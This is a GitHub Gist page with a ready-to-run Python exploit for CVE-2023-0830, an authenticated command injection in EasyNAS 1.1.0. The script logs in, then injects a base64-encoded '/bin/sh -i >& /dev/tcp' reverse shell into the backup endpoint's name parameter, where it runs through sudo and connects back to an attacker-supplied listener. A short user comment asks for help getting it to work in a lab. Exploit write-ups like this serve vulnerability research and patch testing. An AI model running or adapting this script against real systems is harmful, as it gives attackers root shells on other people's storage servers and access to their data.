Skip to content

Instantly share code, notes, and snippets.

@xbz0n
Last active November 2, 2023 16:09
Show Gist options
  • Save xbz0n/674af0e802efaaafe90d2f67464c2690 to your computer and use it in GitHub Desktop.
Save xbz0n/674af0e802efaaafe90d2f67464c2690 to your computer and use it in GitHub Desktop.
EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.1.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#!/usr/bin/python3
import requests
import sys
import base64
import urllib.parse
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disable the insecure request warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
sys.exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])
# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload
payload = urllib.parse.quote(payload)
# Create the login data
login_data = {
'usr':user,
'pwd':password,
'action':'login'
}
# Create a session
session = requests.Session()
# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)
# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
print("Unsuccessful login")
sys.exit()
else:
print("Login successful")
# send the exploit request
timeout = 3
try:
exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
if exploit_response.status_code != 200:
print("[+] Everything seems ok, check your listener.")
else:
print("[-] Exploit failed, system is patched or credentials are wrong.")
except requests.exceptions.ReadTimeout:
print("[-] Everything seems ok, check your listener.")
sys.exit()
@abedcyse
Copy link

abedcyse commented Nov 2, 2023

hello, can you please help me with this?
I downloaded the vulnerable version on virtual box.
I can ping it.
I created an account and was able to log in.
I tried to run the exploit with nc running, the code runs and gives me ([-] Everything seems ok, check your listener.)
nc doesn't show anything. what could be the problem? thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment